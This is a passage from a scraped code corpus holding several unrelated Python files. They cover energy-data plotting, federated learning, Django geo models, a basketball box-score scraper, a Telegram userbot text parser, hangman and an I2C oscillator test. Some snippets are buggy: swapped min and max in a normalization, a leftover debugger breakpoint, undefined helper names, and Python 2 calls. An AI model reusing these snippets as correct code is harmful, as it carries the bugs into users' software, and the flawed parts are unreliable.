Power(W)\")\n\nplt.subplot(3,1,2)\nplt.plot(DF_Temperature_celsius)\nplt.xlabel(\"Time\")\nplt.ylabel(\"Temperature\")\n\nplt.subplot(3,1,3)\nplt.plot(DF_Irradiance_insomedaysinMay)\nplt.xlabel(\"data\")\nplt.ylabel(\"Generation-->Irradiance\")\n\n#changing the scale\ntemp_max=DF_joined_cleaned[\"temperature\"].min()\ntemp_min=DF_joined_cleaned[\"temperature\"].max()\nDF_joined_cleaned[\"Temperature Normalized\"]=(DF_joined_cleaned[\"temperature\"]-temp_min)/(temp_max-temp_min)\n\nDF_joined_cleaned.head(4)\n\nair_conditioner_5545_min=DF_joined_cleaned[\"air conditioner_5545\"].min()\nair_conditioner_5545_max=DF_joined_cleaned[\"air conditioner_5545\"].max()\nDF_joined_cleaned[\"air conditioner_5545 Normalized\"]=(DF_joined_cleaned[\"air conditioner_5545\"]-air_conditioner_5545_min)/(air_conditioner_5545_max-air_conditioner_5545_min)\n\ngen_min=DF_joined_cleaned[\"gen\"].min()\ngen_max=DF_joined_cleaned[\"gen\"].max()\nDF_joined_cleaned[\"gen Normalized\"]=(DF_joined_cleaned[\"gen\"]-gen_min)/(gen_max-gen_min)\n\n\nplt.figure()\nplt.plot(DF_joined_cleaned[\"Temperature Normalized\"])\nplt.plot(DF_joined_cleaned[\"air conditioner_5545 Normalized\"])\nplt.plot(DF_joined_cleaned[\"gen Normalized\"])\nplt.xlabel(\"Time\")\nplt.ylabel(\"Normalized Data\")","sub_path":"Assignment7_B/Assignment 8B_GiuliaSora/Assignment8partB.py","file_name":"Assignment8partB.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"581810170","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Python version: 3.6\r\n\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nimport copy\r\nimport numpy as np\r\nfrom torchvision import datasets, transforms\r\nimport torch\r\nimport time\r\n\r\nfrom utils.sampling import mnist_iid, mnist_noniid, cifar_iid\r\nfrom utils.options import args_parser\r\nfrom models.Update import LocalUpdate\r\nfrom models.Nets import MLP, CNNMnist, CNNCifar\r\nfrom models.Fed import FedAvg\r\nfrom models.test import test_img\r\n\r\n\r\nif __name__ == '__main__':\r\n # parse args\r\n args = args_parser()\r\n args.device = torch.device('cuda:{}'.format(args.gpu) if torch.cuda.is_available() and args.gpu != -1 else 'cpu') #使用gpu或cpu\r\n\r\n # load dataset and split users\r\n if args.dataset == 'mnist': #图片格式为28*28*1\r\n #Compose函数把多个图像处理步骤放在一起\r\n trans_mnist = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]) #均值和方差\r\n dataset_train = datasets.FashionMNIST('../dataset/', train=True, download=True, transform=trans_mnist)\r\n dataset_test = datasets.FashionMNIST('../dataset/', train=False, download=True, transform=trans_mnist)\r\n # sample users\r\n if args.iid:\r\n #dict_users = mnist_iid(dataset_train, args.num_users) #把数据集分成100份,即每份600个\r\n dict_users=np.load(f'./save/dict_users_{args.num_users}.npy',allow_pickle=True).tolist()\r\n else:\r\n dict_users = mnist_noniid(dataset_train, args.num_users)\r\n elif args.dataset == 'cifar': #图片格式为32*32*3\r\n trans_cifar = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\r\n dataset_train = datasets.CIFAR10('../dataset/', train=True, download=True, transform=trans_cifar)\r\n dataset_test = datasets.CIFAR10('../dataset/', train=False, download=True, transform=trans_cifar)\r\n if args.iid:\r\n #dict_users = cifar_iid(dataset_train, args.num_users)\r\n dict_users=np.load(f'./save/cifar_dict_users_{args.num_users}.npy',allow_pickle=True).tolist()\r\n else:\r\n exit('Error: only consider IID setting in CIFAR10')\r\n else:\r\n exit('Error: unrecognized dataset')\r\n img_size = dataset_train[0][0].shape #结果为1*28*28\r\n\r\n # build model\r\n if args.model == 'cnn' and args.dataset == 'cifar':\r\n net_glob = CNNCifar(args=args).to(args.device)\r\n elif args.model == 'cnn' and args.dataset == 'mnist':\r\n net_glob = CNNMnist(args=args).to(args.device)\r\n elif args.model == 'mlp':\r\n len_in = 1\r\n for x in img_size:\r\n len_in *= x\r\n net_glob = MLP(dim_in=len_in, dim_hidden=200, dim_out=args.num_classes).to(args.device)\r\n else:\r\n exit('Error: unrecognized model')\r\n print(net_glob,'\\n') #打印神经网络信息,由nn.module类提供\r\n\r\n #torch.save(net_glob.state_dict(),'./save/cifar_weight.pth')\r\n\r\n # copy weights\r\n # net_glob.load_state_dict(torch.load('./save/cifar_weight.pth'))\r\n net_glob.load_state_dict(torch.load('./save/weight.pth'))\r\n net_glob.train() #启用 BatchNormalization和Dropout, 与eval函数相对\r\n w_glob = net_glob.state_dict() #暂存初始网络参数\r\n\r\n # training\r\n loss_train = [] #存放每进行一次FedAvg的损失\r\n round_accuracy=[]\r\n\r\n gama=1 #信道分配\r\n B=1 #信道增益\r\n S=100 #模型大小\r\n p=1 #传输功率\r\n N0=1 #噪声功率\r\n sigma=1/3 #训练时间修正因子\r\n # h_sq= np.abs(np.random.exponential(1,args.num_users).tolist()) #信道增益的平方,服从指数分布\r\n # all_upload_time_list=[int(S/(gama*B*np.log2(1+p*i/gama*B*N0))) for i in h_sq] #上传时间\r\n computer_level=np.random.uniform(1,9,args.num_users).tolist() #计算能力\r\n communicate_time=[] #记录每轮通信时间 \r\n all_train_time_list=[int(sigma*args.local_ep*len(dict_users[i])/computer_level[i]) for i in range(args.num_users)]\r\n #upload_time_list = np.load('./save/upload_time.npy').tolist()\r\n #upload_time_list= np.abs(np.trunc(15*np.random.randn(args.num_users)+60).astype(int).tolist()) #随机设置上传时间\r\n acc_test=0\r\n iter=0\r\n acc=70\r\n # np.save('./save/upload_time.npy',upload_time_list)\r\n # time_start=time.time() #计时开始\r\n #for iter in range(args.epochs): #默认值已设为10,一个迭代进行一次FedAvg\r\n while acc_test<=acc:\r\n print('Round {:3d}'.format(iter+1))\r\n w_locals, loss_locals,w_idx= [], [], []#存放每个用户的本地模型参数和损失\r\n w_delta=[] #存放每个用户的||Δw||\r\n m = max(int(args.frac * args.num_users), 1) #结果为10\r\n h_sq= np.abs(np.random.exponential(1,args.num_users).tolist()) #信道增益的平方,服从指数分布\r\n all_upload_time_list=[int(S/(gama*B*np.log2(1+p*i/gama*B*N0))) for i in h_sq] #上传时间\r\n idxs_users = np.random.choice(range(args.num_users), m, replace=False) #在100个用户中随机选10个用户\r\n train_time=max([all_train_time_list[idx] for idx in idxs_users])\r\n for idx in idxs_users:\r\n #LocalUpdate函数为一个用户的训练网络函数\r\n local = LocalUpdate(args=args, dataset=dataset_train, idxs=dict_users[idx]) #idxs为一个用户的数据集,大小为600\r\n ww, loss = local.train(net=copy.deepcopy(net_glob).to(args.device))\r\n\r\n #求该用户二范数的变化量\r\n w=copy.deepcopy(ww) #某用户训练完后的权值\r\n delta_w=copy.deepcopy(w_glob) #初始化Δw向量\r\n for Weight in delta_w.keys():\r\n delta_w[Weight]=w[Weight]-w_glob[Weight] #该用户训练完后的权值和全局模型权值做差\r\n w_norm=0\r\n for w_name,w_par in delta_w.items(): \r\n w_norm=w_norm+(np.linalg.norm(w_par.cpu().numpy()))**2 #依次求二范数平方再求和\r\n #print(len(dict_users[idx]),',用户',idx,':',(w_norm)**0.5)\r\n #\r\n w_locals.append(w)\r\n loss_locals.append(copy.deepcopy(loss))\r\n w_delta.append(w_norm)\r\n # np.save('./save/w_delta.npy',w_delta)\r\n # update global weights\r\n #挑选二范数大的一半用户\r\n sorted_list=sorted(enumerate(w_delta),key=lambda x: x[1],reverse = True)\r\n w_idx=[idxs_users[i[0]] for i in sorted_list][0:int(m/2)]\r\n upload_time=sum([all_upload_time_list[i] for i in w_idx])\r\n w_locals=[w_locals[i[0]] for i in sorted_list][0:int(m/2)]\r\n one_communicate_time=train_time+upload_time\r\n communicate_time.append(one_communicate_time)\r\n #print('选中的用户为',w_idx)\r\n w_glob = FedAvg(w_locals)\r\n\r\n # copy weight to net_glob \r\n net_glob.load_state_dict(w_glob)\r\n #if iter%5==0:s\r\n net_glob.eval()\r\n acc_test, loss_test = test_img(net_glob, dataset_test, args)\r\n net_glob.train()\r\n round_accuracy.append(acc_test)\r\n # print loss\r\n loss_avg = sum(loss_locals) / len(loss_locals)\r\n print('Average loss {:.3f}'.format(loss_avg))\r\n print('Test accuracy {:.2f}%'.format(acc_test))\r\n #print('训练时间:',train_time,',上传时间:',upload_time,'\\n')\r\n loss_train.append(loss_avg)\r\n iter=iter+1\r\n # time_end=time.time() #计时结束\r\n # print('time cost',time_end-time_start,'s')\r\n\r\n Time=time.strftime(\"%m.%d.%H.%M\", time.localtime()) #记录时间,用来画图的命名\r\n plt.figure()\r\n plt.plot(range(len(loss_train)), loss_train)\r\n plt.xlabel('Round')\r\n plt.ylabel('Train_loss')\r\n plt.savefig('./figure/{}_Train loss_{}_IID-{}_Epochs-{}.png'.format(Time,args.model,args.iid,iter))\r\n\r\n # plot accuracy curve\r\n plt.figure()\r\n plot_x=[sum(communicate_time[:i+1]) for i in range(len(communicate_time))] #计算横坐标\r\n plt.plot(plot_x,round_accuracy)\r\n plt.xlabel('Time / s')\r\n plt.ylabel('Test_accurac / %')\r\n plt.savefig('./figure/{}_Test accuracy_{}_IID-{}_Epochs-{}.png'.format(Time,args.model,args.iid,iter))\r\n\r\n # save data\r\n plot_data=[] #第一个保存训练损失,第二个保存时间,第三个保存测试精度\r\n plot_data.append(loss_train)\r\n plot_data.append(plot_x)\r\n plot_data.append(round_accuracy)\r\n np.save('./figure data/{}_Figure data_{}_IID-{}_Epochs-{}.npy'.format(Time,args.model,args.iid,iter),plot_data)\r\n print('数据保存成功')\r\n","sub_path":"w select/main_fed.py","file_name":"main_fed.py","file_ext":"py","file_size_in_byte":8621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"499234936","text":"# -*- coding: UTF-8 -*-\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.contrib.gis.db import models as gis_models\nfrom django.contrib.gis.geos import Point, fromstr\nfrom django.contrib.gis.measure import D\nfrom django.utils.timezone import utc\nfrom django.core.paginator import Paginator, EmptyPage\nfrom quan.models import *\nfrom photos.models import *\nfrom rss.models import *\nimport dbarray, json, datetime\n# Create your models here.\n\nclass Circle(models.Model):\n user_source = models.IntegerField() # 1 is app user, 2 is weixinuser\n circle_users = dbarray.IntegerArrayField()\n point = gis_models.PointField()\n objects = gis_models.GeoManager()\n user = models.OneToOneField(User)\n topic_ids = dbarray.IntegerArrayField()\n last_access = models.DateTimeField(default=datetime.datetime.utcnow().replace(tzinfo=utc)) # recorde the last-access datatime\n not_deleted = models.BooleanField() # mark if this circle should be computed\n \n def add_topic(self, topic):\n self.topic_ids.append(topic.id)\n for notice_user_id in self.circle_users:\n notice_user = User.objects.get(id = notice_user_id)\n if not notice_user.circle.not_deleted:\n continue\n notice_user.circle.topic_ids.append(topic.id)\n notice_user.circle.save()\n self.save()\n \n def get_topics(self):\n pass\n\n\ndef create_circle(user, source, curpoint, distance=500000):\n try:\n incircles = Circle.objects.filter(point__distance_lt=(curpoint, D(km=int(distance) / 1000)))\n newcircleusers = []\n if incircles:\n for circle in incircles:\n circle.circle_users.append(user.id)\n circle.save()\n newcircleusers.append(circle.user.id)\n newcircle = Circle(user=user, user_source=source, circle_users=newcircleusers, point=curpoint, not_deleted=True, topic_ids=[])\n newcircle.save()\n return 'OK'\n except Exception as e:\n print(e)\n return 'ERROR'\n\ndef create_circle_from_position(user, source, longitude, latitude, distance=5000):\n point = fromstr(\"POINT(%s %s)\" % (longitude, latitude))\n create_circle(user, source, point, distance)\n\ndef remove_circle(user, source):\n if not Circle.objects.filter(user = user):\n return 'OK'\n del_circle = user.circle\n if del_circle:\n for circle in Circle.objects.all():\n if circle.not_deleted:\n print(del_circle.user.id)\n if del_circle.user.id in circle.circle_users:\n circle.circle_users.remove(del_circle.user.id)\n circle.save()\n del_circle.delete()\n return 'OK'\n \n\nclass JiaTopic(TopicBase):\n point = gis_models.PointField()\n objects = gis_models.GeoManager()\n\nclass JiaComment(CommentBase):\n topic = models.ForeignKey(JiaTopic)\n class Meta:\n unique_together = (\"topic\", \"from_user\")\n \nclass JiaPraise(PraiseBase):\n topic = models.ForeignKey(JiaTopic, related_name=\"JiaPraiseTopic\")\n \nclass Photo(PhotoBase):\n topic = models.ForeignKey(JiaTopic)\n\nclass JiaTopicCollection(models.Model):\n user = models.OneToOneField(User)\n collections = dbarray.IntegerArrayField()\n\n\ndef count_praise(topic):\n praise_num = JiaPraise.objects.filter(topic = topic).count()\n return praise_num\n\n\ndef get_nearby_topic(longitude, latitude, page_size = 5, city = None):\n point = fromstr(\"POINT(%s %s)\" % (longitude, latitude))\n topics = JiaTopic.objects.distance(point).order_by('distance')\n topics_list = list(topics)\n topics_list.sort(key=lambda topic:topic.update_time, reverse=True)\n rets = circletopiclist_encode(topics_list)\n newsret = circlenews_encode(get_localnews_bycity(city))\n if newsret:\n rets.insert(0, newsret)\n paginator = Paginator(rets, page_size)\n return paginator\n\ndef get_nearby_point_topic(point, page_size = 5, city = None):\n topics = JiaTopic.objects.distance(point).order_by('distance')\n topics_list = list(topics)\n topics_list.sort(key=lambda topic:topic.update_time, reverse=True)\n rets = circletopiclist_encode(topics_list)\n newsret = circlenews_encode(get_localnews_bycity(city))\n if newsret:\n rets.insert(0, newsret)\n paginator = Paginator(rets, page_size)\n return paginator\n\n\ndef comments_encode(JiaComments):\n rets = []\n number = len(list(JiaComments))\n for i in range(0, number):\n JiaComment = JiaComments[i]\n c = {}\n c['from_user'] = JiaComment.from_user.username\n c['content'] = JiaComment.content\n c['create_time'] = JiaComment.create_time.strftime('%Y-%m-%d %H:%M:%S' )\n print(c)\n rets.append(c)\n return rets\n\n\ndef circletopiclist_encode(topics):\n rets = []\n number = len(list(topics))\n for i in range(0, number):\n topic = topics[i]\n t = {}\n t['topicid'] = topic.id\n t['from_user'] = topic.from_user.username\n t['headurl'] = getheadurl(topic.from_user, 'thumbnail')\n t['content'] = topic.content\n t['comments_num'] = len(JiaComment.objects.filter(topic = topic))\n t['create_time'] = topic.create_time.strftime('%Y-%m-%d %H:%M:%S' )\n t['update_time'] = topic.update_time.strftime('%Y-%m-%d %H:%M:%S' )\n t['link'] = \"\"\n t['praise_num'] = count_praise(topic)\n rets.append(t)\n #return json.dumps(rets, ensure_ascii=False)\n return rets\n\n\ndef circletopic_encode(topics):\n rets = []\n number = len(list(topics))\n for i in range(0, number):\n topic = topics[i]\n t = {}\n t['topicid'] = topic.id\n t['from_user'] = topic.from_user.username\n t['content'] = topic.content\n t['create_time'] = topic.create_time.strftime('%Y-%m-%d %H:%M:%S' )\n t['update_time'] = topic.update_time.strftime('%Y-%m-%d %H:%M:%S' )\n t['JiaComments'] = comments_encode(JiaComment.objects.filter(topic = topic))\n print(t)\n rets.append(t)\n return json.dumps(rets, ensure_ascii=False)\n\n\n#序列化圈子新闻\ndef circlenews_encode(news):\n t = {}\n t['topicid'] = -news.id\n t['from_user'] = \"ywb\"\n t['from_user_id'] = 0\n t['headurl'] = getheadurl(None, 'thumbnail')\n t['content'] = news.title\n t['comments_num'] = 0\n t['create_time'] = news.create_time.strftime('%Y-%m-%d %H:%M:%S' )\n t['update_time'] = news.published_time.strftime('%Y-%m-%d %H:%M:%S' )\n t['link'] = news.link\n return t\n \n #序列化圈子新闻\ndef circlenewslist_encode(newslist):\n rets = []\n number = len(list(newslist))\n for i in range(0, number):\n news = newslist[i]\n t = {}\n t['topicid'] = -news.id\n t['from_user'] = \"养娃宝新闻精选\"\n t['from_user_id'] = 0\n t['headurl'] = getheadurl(None, 'thumbnail')\n t['content'] = news.title\n t['comments_num'] = 0\n t['create_time'] = news.create_time.strftime('%Y-%m-%d %H:%M:%S' )\n t['update_time'] = news.published_time.strftime('%Y-%m-%d %H:%M:%S' )\n t['link'] = news.link\n t['praise_num'] = 0\n rets.append(t)\n return rets\n\n\ndef get_topics_byids(ids):\n if not ids:\n return None\n topics =JiaTopic.objects.filter(id__in = ids)\n topics_list = list(topics)\n topics_list.sort(key=lambda topics: -ids.index(topics.id))\n return topics_list","sub_path":"jiaquan/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"531578537","text":"from pathlib import Path\nfrom math import ceil\nimport pytest\nfrom pipen.channel import *\nfrom plyrda.all import *\n\nfrom pandas import DataFrame\n\ndef test_create():\n assert isinstance(Channel.create(DataFrame([[1]])), DataFrame)\n\ndef test_from_glob():\n glob = Path(__file__).parent / 'test_*.py'\n glob_files = list(Path(__file__).parent.glob('test_*.py'))\n ch = Channel.from_glob(glob)\n assert ch.shape == (len(glob_files), 1)\n\ndef test_from_pairs():\n glob = Path(__file__).parent / 'test_*.py'\n glob_files = list(Path(__file__).parent.glob('test_*.py'))\n ch = Channel.from_pairs(glob)\n assert ch.shape == (ceil(len(glob_files) / 2.0), 2)\n\ndef test_expand_dir_collapse_files():\n ch0 = Channel.create([(Path(__file__).parent.as_posix(), 1)])\n ch1 = ch0 >> expand_dir(pattern='test_*.py')\n glob_files = list(Path(__file__).parent.glob('test_*.py'))\n assert ch1.shape == (len(glob_files), 2)\n\n ch2 = ch1 >> collapse_files()\n assert ch2.equals(ch0)\n","sub_path":"tests/test_channel.py","file_name":"test_channel.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"554325337","text":"'''Tutorial:\nhttp://www.quuxlabs.com/blog/2010/09/matrix-factorization-a-simple-tutorial-and-implementation-in-python/\n'''\nimport numpy\n\n\ndef matrix_factorization(R, P, Q, K, steps=4, alpha=0.0002, beta=0.02):\n\n Q = Q.T\n\n for step in xrange(steps):\n\n for i in xrange(len(R)):\n\n for j in xrange(len(R[i])):\n\n if R[i][j] > 0:\n\n # tich co huong: hang i X cot j\n eij = R[i][j] - numpy.dot(P[i, :], Q[:, j])\n\n for k in xrange(K): # update\n\n P[i][k] = P[i][k] + alpha * \\\n (2 * eij * Q[k][j] - beta * P[i][k])\n\n Q[k][j] = Q[k][j] + alpha * \\\n (2 * eij * P[i][k] - beta * Q[k][j])\n\n # check the overall error, if it's good enough -> break ^^\n # eR = numpy.dot(P,Q)\n # print(eR)\n\n e = 0\n\n for i in xrange(len(R)):\n\n for j in xrange(len(R[i])):\n\n if R[i][j] > 0:\n\n e = e + pow(R[i][j] - numpy.dot(P[i, :], Q[:, j]), 2)\n\n for k in xrange(K):\n\n e = e + (beta / 2) * \\\n (pow(P[i][k], 2) + pow(Q[k][j], 2))\n\n if e < 0.001:\n\n break\n\n return P, Q.T\n\n\nR = [\n [5, 3, 0, 1],\n [4, 0, 0, 1],\n [1, 1, 0, 5],\n [1, 0, 0, 4],\n [0, 1, 5, 4]\n]\nR = numpy.array(R)\nN = len(R)\nM = len(R[0])\nK = 2\nP = numpy.random.rand(N, K)\nQ = numpy.random.rand(M, K)\n\nnP, nQ = matrix_factorization(R, P, Q, K, 5000)\nnR = numpy.dot(nP, nQ.T)\nprint(nR)\n","sub_path":"matrixFactorization.py","file_name":"matrixFactorization.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"255204897","text":"class Solution:\n # Simple BFS\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n if endWord not in wordList:\n return 0\n queue, visit = deque([beginWord]), set(beginWord)\n # improve performance when check word exists in wordList\n wordList = set(wordList)\n changes = 1\n alph = \"abcdefghijklmnopqrstuvwxyz\"\n\n while queue:\n changes += 1\n for i in range(len(queue)):\n currWord = queue.popleft()\n for i in range(len(currWord)):\n prefix, suffix, = currWord[:i], currWord[i+1:]\n for letter in alph:\n replacedWord = prefix + letter + suffix\n if replacedWord in wordList and replacedWord not in visit:\n if replacedWord == endWord:\n return changes\n visit.add(replacedWord)\n queue.append(replacedWord)\n return 0\n","sub_path":"127.WordLadder.py","file_name":"127.WordLadder.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"605563775","text":"from nba_driver import *\n\ndef get_games(driver, game_ids):\n base_url = 'https://www.basketball-reference.com/boxscores/'\n def single_game(game_id):\n tables = dict()\n game_soup = get_soup(driver, base_url+game_id+'.html')\n line_score_html = game_soup.find('table', id='line_score')\n if line_score_html is not None:\n line_score = pd.read_html(str(line_score_html))[0]\n correct_cols = ['Team'] + list(line_score.iloc[0][1:])\n line_score.columns = correct_cols\n line_score.drop(0, inplace=True)\n away = str.lower(line_score.iloc[0,0])\n home = str.lower(line_score.iloc[1,0])\n tables['line_score'] = line_score\n\n ff_html = game_soup.find('table', id='four_factors')\n if ff_html is not None:\n ff_corrected = '' + str(ff_html.tbody) + '
'\n ff = pd.read_html(ff_corrected)[0]\n ff.rename(columns={'Unnamed: 0': 'Team'}, inplace=True)\n tables['ff'] = ff\n\n for tag in game_soup.find_all('th', attrs={'class': 'over_header'}):\n tag.decompose()\n\n table_ids = ['box_' + away + '_basic', 'box_' + away + '_advanced',\n 'box_' + home + '_basic', 'box_' + home + '_advanced']\n table_names = ['away_basic', 'away_advanced', 'home_basic', 'home_advanced']\n ipdb.set_trace()\n for (table_id, table_name) in zip(table_ids, table_names):\n html = game_soup.find('table', id=table_id)\n if html is not None:\n [t.decompose() for t in html('tr', attrs={'class':'thead'})]\n table = pd.read_html(str(html))[0]\n table.rename(columns={'Starters':'Player'})\n table = table[:-1]\n tables[table_name] = table\n\n return tables\n\n rtn = []\n for g in game_ids:\n rtn.append(single_game(g))\n sleep(1)\n return rtn\n \n \n \n \n","sub_path":"src/data/nba_data_game.py","file_name":"nba_data_game.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"44295125","text":"# CYBERUSERBOT\n#\n\nimport re, os\nfrom random import choice\nimport logging\n\nfrom telethon import events\nfrom telethon.extensions.markdown import DEFAULT_URL_RE\nfrom telethon.tl import types\nfrom telethon.tl.functions.messages import EditMessageRequest\nfrom telethon.tl.types import (\n MessageEntityBold,\n MessageEntityCode,\n MessageEntityItalic,\n MessageEntityPre,\n MessageEntityTextUrl,\n MessageEntityUnderline,\n)\n\n#------------------ CYBERUSERBOT -------------------#\n\n\nPARSED_ENTITIES = (\n MessageEntityBold,\n MessageEntityItalic,\n MessageEntityCode,\n MessageEntityPre,\n MessageEntityTextUrl,\n MessageEntityUnderline,\n)\n\n\n#------------------ CYBERUSERBOT -------------------#\n\nMATCHERS = [\n (DEFAULT_URL_RE, parse_url_match),\n (get_tag_parser(\"**\", MessageEntityBold)),\n (get_tag_parser(\"__\", MessageEntityItalic)),\n (get_tag_parser(\"```\", partial(MessageEntityPre, language=\"\"))),\n (get_tag_parser(\"`\", MessageEntityCode)),\n (get_tag_parser(\"--\", MessageEntityUnderline)),\n (re.compile(r\"\\+\\+(.+?)\\+\\+\"), parse_aesthetics),\n (re.compile(r\"([^/\\w]|^)(/?(r/\\w+))\"), parse_subreddit),\n (re.compile(r\"(?\\3', newstr, 0)\n for match in usernexp.finditer(newstr):\n user = match.group(1)\n text = match.group(2)\n name, entities = await event.client._parse_message_text(text, \"md\")\n rep = f'{name}'\n if entities:\n for e in entities:\n tag = None\n if isinstance(e, types.MessageEntityBold):\n tag = \"{}\"\n elif isinstance(e, types.MessageEntityItalic):\n tag = \"{}\"\n elif isinstance(e, types.MessageEntityCode):\n tag = \"{}\"\n elif isinstance(e, types.MessageEntityStrike):\n tag = \"{}\"\n elif isinstance(e, types.MessageEntityPre):\n tag = \"
{}
\"\n elif isinstance(e, types.MessageEntityUnderline):\n tag = \"{}\"\n if tag:\n rep = tag.format(rep)\n newstr = re.sub(re.escape(match.group(0)), rep, newstr)\n if newstr != event.text:\n await event.edit(newstr, parse_mode=\"html\")\n","sub_path":"userbot/helpers/tag.py","file_name":"tag.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"212662246","text":"from .exceptions import *\nimport random\n\n# Complete with your own, just for fun :)\nLIST_OF_WORDS = []\n\n\ndef _get_random_word(list_of_words):\n try:\n return random.choice(list_of_words)\n except IndexError as e:\n raise InvalidListOfWordsException\n pass\n\n\ndef _mask_word(word):\n length = len(word)\n masked = \"*\" * length\n if length == 0 :\n raise InvalidWordException\n return masked\n \n\n\ndef _uncover_word(answer_word, masked_word, character):\n if not (len(character) == 1):\n raise InvalidGuessedLetterException\n if not len(answer_word) == len(masked_word):\n raise InvalidWordException\n if not len(answer_word) >0 :\n raise InvalidWordException \n \n \n newmask = \"\"\n for index,letter in enumerate(answer_word):\n if letter.lower() == character.lower():\n newmask += letter.lower()\n else:\n newmask += masked_word[index].lower()\n return newmask\n \n\n\ndef guess_letter(game, letter):\n if game['answer_word'].lower() == game['masked_word'].lower():\n raise GameFinishedException\n \n if game['remaining_misses'] == 0 :\n raise GameFinishedException()\n \n old_mask = game['masked_word']\n game['previous_guesses'].append(letter.lower())\n new_mask = _uncover_word(game['answer_word'],old_mask,letter)\n game['masked_word'] = new_mask\n \n\n \n if new_mask == old_mask:\n game['remaining_misses'] -= 1\n \n if new_mask.lower() == game['answer_word'].lower():\n raise GameWonException\n \n if game['remaining_misses'] == 0:\n raise GameLostException\n pass\n\n\ndef start_new_game(list_of_words=None, number_of_guesses=5):\n if list_of_words is None:\n list_of_words = LIST_OF_WORDS\n\n word_to_guess = _get_random_word(list_of_words)\n masked_word = _mask_word(word_to_guess)\n game = {\n 'answer_word': word_to_guess,\n 'masked_word': masked_word,\n 'previous_guesses': [],\n 'remaining_misses': number_of_guesses,\n }\n\n return game\n","sub_path":"hangman/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"477999228","text":"__author__ = 'ewaandrejczuk'\n\nimport matplotlib.pyplot as plt\nfrom plotly.graph_objs import *\nimport numpy as np\n\ndef plot_results1(beta_run, differencesBetweenRankings):\n\n plt.plot(beta_run, differencesBetweenRankings, label =\"Differences Between Rankings\")\n\n plt.ylim(0, 20)\n\n plt.xticks(range(0, 91, 20), [str(x) for x in range(0, 91, 20)], fontsize=14)\n plt.yticks(fontsize=14)\n\n plt.xlabel('Beta')\n plt.ylabel('Difference')\n\n #plot only errorbars\n #plt.errorbar(RunList, ResultsBlamerRuns, yerr=error_bl, linestyle=\"None\", marker=\"None\", color=\"blue\")\n #plt.errorbar(RunList, ResultsAveragerRuns, yerr=error_avg, linestyle=\"None\", marker=\"None\", color=\"green\")\n plt.legend()\n plt.show()\n\ndef plot_results2(x,y):\n width = 4 #/1.5\n plt.bar( x, y, width, color=\"blue\" )\n plt.ylabel( \"% of improvement of CJ wrt SAWA\" )\n plt.xlabel( 'Beta parameter value' )\n plt.show()\n\n#if __name__ == \"__main__\":\n\n# beta_run = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100]\n# difference = [10.28379914543377, 12.584340963242225, 16.969843225638868, 16.632541257895241, 17.697784228793335, 15.81089710776611, 16.080542604427485, 17.983242804140943, 16.062275743897569, 17.589846090923935]\n# plot(difference,beta_run)\n #plot_experiment2(beta_run, difference)\n\n\n","sub_path":"TeamTrust/Plot_results.py","file_name":"Plot_results.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"468415793","text":"# Measures the current output frequency from SI570\n# also one can configure it to a different frequency\nimport sys\nimport numpy as np\nbedrock_dir = \"../../\"\nsys.path.append(bedrock_dir + \"peripheral_drivers/i2cbridge\")\nsys.path.append(bedrock_dir + \"badger\")\nsys.path.append(bedrock_dir + \"projects/common\")\nimport leep\nimport assem\nimport testcase\nfrom time import sleep\n\n\n# select one port of an I2C bus multiplexer\n# port_n must be between 0 and 7\ndef busmux_sel(s, port_n):\n tca9548a_addr = 0xe0\n return s.write(tca9548a_addr, 1 << port_n, [])\n\n\ndef busmux_reset(s):\n a = []\n a += s.pause(10)\n a += s.hw_config(1) # turn on reset\n a += s.pause(10)\n a += s.hw_config(0) # turn off reset\n a += s.pause(10)\n return a\n\n\ndef hw_test_prog():\n s = assem.i2c_assem()\n si570_list = [0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12]\n a = []\n a += s.pause(2) # ignored?\n a += s.set_resx(3) # avoid any confusion\n a += busmux_reset(s)\n #\n a += busmux_sel(s, 6) # App bus\n a += s.read(0xe0, 0, 1, addr_bytes=0) # busmux readback\n\n a += s.write(0x42, 6, [0xfe, 0x77]) # U39 Configuration registers\n a += s.write(0x42, 2, [0x00, 0x88]) # U39 output register for clkmux_reset and SI570_OE\n # pull down MOD_SEL, RESET and LPMODE, i.e set them as outputs\n a += s.write(0x44, 6, [0x37, 0x37]) # U34 Configuration registers\n a += s.write(0x44, 2, [0x48, 0x48]) # U34 Output registers\n\n a += s.pause(100)\n for ax in si570_list:\n a += s.read(0xee, ax, 1) # config register0 with 2 bytes to read\n\n a += s.trig_analyz()\n #\n jump_n = 9\n a += s.jump(jump_n)\n a += s.pad(jump_n, len(a))\n #\n # Start of polling loop\n a += s.set_resx(0)\n a += busmux_sel(s, 6) # App bus\n # keep clkmux_reset high always\n a += 